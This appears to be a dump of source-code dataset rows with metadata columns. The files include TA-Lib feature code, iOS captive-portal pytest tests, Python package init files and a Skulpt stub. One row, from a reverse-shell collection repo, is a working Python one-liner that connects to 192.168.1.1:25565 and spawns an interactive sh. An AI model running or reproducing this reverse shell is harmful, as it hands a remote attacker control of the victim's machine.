feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.MOM(close, timeperiod=t), name=f"MOM_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.PLUS_DI(high, low, close, timeperiod=t), name=f"PLUS_DI_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.PLUS_DM(high, low, timeperiod=t), name=f"PLUS_DM_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for f, s in zip(range(10, 15), range(25, 30)):
series = pd.Series(talib.PPO(close, fastperiod=f, slowperiod=s, matype=0), name=f"PPO_{f}_{s}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.ROC(close, timeperiod=t), name=f"ROC_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(7, 22):
series = pd.Series(talib.ROCP(close, timeperiod=t), name=f"ROCP_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(6, 22):
series = pd.Series(talib.ROCR100(close, timeperiod=t), name=f"ROCR100_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(5, 22):
series = pd.Series(talib.RSI(close, timeperiod=t), name=f"RSI_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t1, t2, t3 in itertools.product(range(5, 10), range(10, 15), range(25, 30)):
series = pd.Series(talib.ULTOSC(high, low, close, timeperiod1=t1, timeperiod2=t2, timeperiod3=t3), name=f"ULTOSC_{t1}_{t2}_{t3}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
for t in range(5, 22):
series = pd.Series(talib.WILLR(high, low, close, timeperiod=t), name=f"WILLR_{t}", index=feature_df.index)
feature_df = pd.concat((feature_df, series), axis=1)
feature_df = feature_df.bfill()
# Exclude columns you don't want
feature_df = feature_df[feature_df.columns[~feature_df.columns.isin(original_columns)]]
return feature_df
| 58.826667
| 161
| 0.659565
| 718
| 4,412
| 3.906685
| 0.107242
| 0.208556
| 0.189661
| 0.128699
| 0.805704
| 0.746881
| 0.738681
| 0.670945
| 0.649554
| 0.621747
| 0
| 0.031579
| 0.181777
| 4,412
| 75
| 162
| 58.826667
| 0.745429
| 0.0068
| 0
| 0.492754
| 1
| 0
| 0.044967
| 0.004793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.072464
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979610a75a9969078299218d0f4d42e4a76282ac
| 17,066
|
py
|
Python
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/interOp/captive_portal/bridge_mode/ios/test_captive_portal_modes.py
|
Telecominfraproject/wlan-testing
|
32b95f41a79f53958b7641eeed5bcd16af96908c
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
from logging import exception
import io
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
from selenium.common.exceptions import NoSuchElementException
import sys
import allure
if 'perfecto_libs' not in sys.path:
sys.path.append(f'../libs/perfecto_libs')
from iOS_lib import closeApp, openApp, get_WifiIPAddress_iOS, ForgetWifiConnection, ping_deftapps_iOS, \
Toggle_AirplaneMode_iOS, set_APconnMobileDevice_iOS, verify_APconnMobileDevice_iOS, Toggle_WifiMode_iOS, tearDown,\
verifyUploadDownloadSpeediOS, get_ip_address_ios, captive_portal_ios, wifi_connect, wifi_disconnect_and_forget
pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.ios, pytest.mark.interop_ios,
pytest.mark.captive_portal, pytest.mark.interop_uc_sanity, pytest.mark.bridge]
setup_params_general = {
"mode": "BRIDGE",
"ssid_modes": {
"open": [{"ssid_name": "captive_open_2g", "appliedRadios": ["2G"]},
{"ssid_name": "captive_open_5g", "appliedRadios": ["5G"]}],
"wpa": [{"ssid_name": "captive_wpa_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
{"ssid_name": "captive_wpa_5g", "appliedRadios": ["5G"],
"security_key": "lanforge"}],
"wpa2": [{"ssid_name": "captive_wpa2_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
{"ssid_name": "captive2_wpa_5g", "appliedRadios": ["5G"],
"security_key": "lanforge"}],
"wpa3_personal": [
{"ssid_name": "captive_wpa3_2g", "appliedRadios": ["2G"], "security_key": "lanforge"},
{"ssid_name": "captive_wpa3_5g", "appliedRadios": ["5G"],
"security_key": "lanforge"}]},
"rf": {},
"radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Captive Portal : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("BRIDGE MODE CAPTIVE PORTAL")
# @pytest.mark.parametrize(
# 'setup_profiles',
# [setup_params_general],
# indirect=True,
# scope="class"
# )
#@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeCaptivePortalSuiteOneBridge(object):
""" Captive Portal SuiteA
pytest -m "captive portal and bridge and InteropsuiteA"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5179", name="WIFI-5179")
@pytest.mark.twog
@pytest.mark.open
def test_Captive_Portal_Open_2g_BRIDGE(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["open"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5146", name="WIFI-5146")
@pytest.mark.fiveg
@pytest.mark.open
def test_Captive_Portal_Open_5g_BRIDGE(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["open"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5182", name="WIFI-5182")
@pytest.mark.twog
@pytest.mark.wpa
def test_Captive_Portal_WPA_2g_Bridge(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5149", name="WIFI-5149")
@pytest.mark.fiveg
@pytest.mark.wpa
def test_Captive_Portal_WPA_5g_Bridge(self, request, get_vif_state, get_ap_logs, get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5186", name="WIFI-5186")
@pytest.mark.twog
@pytest.mark.wpa2_personal
def test_Captive_Portal_WPA2_2g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5153", name="WIFI-5153")
@pytest.mark.fiveg
@pytest.mark.wpa2_personal
def test_Captive_Portal_WPA2_5g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5130", name="WIFI-5130")
@pytest.mark.twog
@pytest.mark.wpa3_personal
def test_Captive_Portal_WPA3_2g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa3_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-5140", name="WIFI-5140")
@pytest.mark.sg123
@pytest.mark.fiveg
@pytest.mark.wpa3_personal
def test_Captive_Portal_WPA3_5g_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_APToMobileDevice_data,
setup_perfectoMobile_iOS):
profile_data = setup_params_general["ssid_modes"]["wpa3_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_iOS[1]
driver = setup_perfectoMobile_iOS[0]
connData = get_APToMobileDevice_data
# Set Wifi/AP Mode
ip, is_internet = captive_portal_ios(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert verifyUploadDownloadSpeediOS(request, setup_perfectoMobile_iOS, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_iOS, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
| 48.76
| 119
| 0.647076
| 1,892
| 17,066
| 5.575581
| 0.082981
| 0.036402
| 0.100104
| 0.068253
| 0.866054
| 0.855057
| 0.841028
| 0.833444
| 0.815243
| 0.782159
| 0
| 0.010413
| 0.251553
| 17,066
| 350
| 120
| 48.76
| 0.81547
| 0.021739
| 0
| 0.782007
| 0
| 0
| 0.194454
| 0.00126
| 0
| 0
| 0
| 0
| 0.055363
| 1
| 0.027682
| false
| 0.110727
| 0.051903
| 0
| 0.083045
| 0.083045
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c150e81191b0431daba753fbff16f307710bfae7
| 169
|
py
|
Python
|
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
src/app/models/__init__.py
|
RdevJ/headquater
|
2da2290560b030f7ce365e1b71affd637fb9cab4
|
[
"MIT"
] | null | null | null |
import app.models.tag # noqa
import app.models.article # noqa
import app.models.answer # noqa
import app.models.question # noqa
import app.models.statistics # noqa
| 28.166667
| 36
| 0.763314
| 25
| 169
| 5.16
| 0.36
| 0.348837
| 0.581395
| 0.589147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147929
| 169
| 5
| 37
| 33.8
| 0.895833
| 0.142012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c1772a8deb5d6b2f45c5a62291f01f071685bf33
| 118
|
py
|
Python
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 98
|
2018-02-14T17:23:43.000Z
|
2022-03-29T12:55:40.000Z
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 11
|
2018-03-02T01:27:07.000Z
|
2022-01-05T12:04:45.000Z
|
neuralgym/ops/__init__.py
|
autocomic/neuralgym
|
de7088214eed65e789e4a062f643049b55386485
|
[
"MIT"
] | 77
|
2018-02-18T11:16:48.000Z
|
2022-03-30T01:04:21.000Z
|
from . import summary_ops
from . import loss_ops
from . import image_ops
from . import layers
from . import train_ops
| 19.666667
| 25
| 0.788136
| 19
| 118
| 4.684211
| 0.421053
| 0.561798
| 0.438202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 118
| 5
| 26
| 23.6
| 0.908163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c17d0bdd5bf0af5f43a0985ce61edab5ab028726
| 218
|
py
|
Python
|
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | 1
|
2021-05-22T20:06:42.000Z
|
2021-05-22T20:06:42.000Z
|
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | null | null | null |
ReverShell Collection/Linux Based Attack/RevShellPython_2Linux.py
|
cometteetcaramel/Simple-ReverseShell-Collect
|
948c2344edb59580c5466ab00a58600522afc16b
|
[
"MIT"
] | null | null | null |
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",25565));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
| 218
| 218
| 0.715596
| 42
| 218
| 3.666667
| 0.547619
| 0.116883
| 0.136364
| 0.253247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089623
| 0.027523
| 218
| 1
| 218
| 218
| 0.636792
| 0
| 0
| 0
| 0
| 1
| 0.940639
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c18dc8242faabfbda8c84af0da8494e5b4c8da18
| 41
|
py
|
Python
|
src/lib/posixpath.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/posixpath.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/posixpath.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("posixpath")
| 20.5
| 40
| 0.780488
| 6
| 41
| 4.5
| 0.666667
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.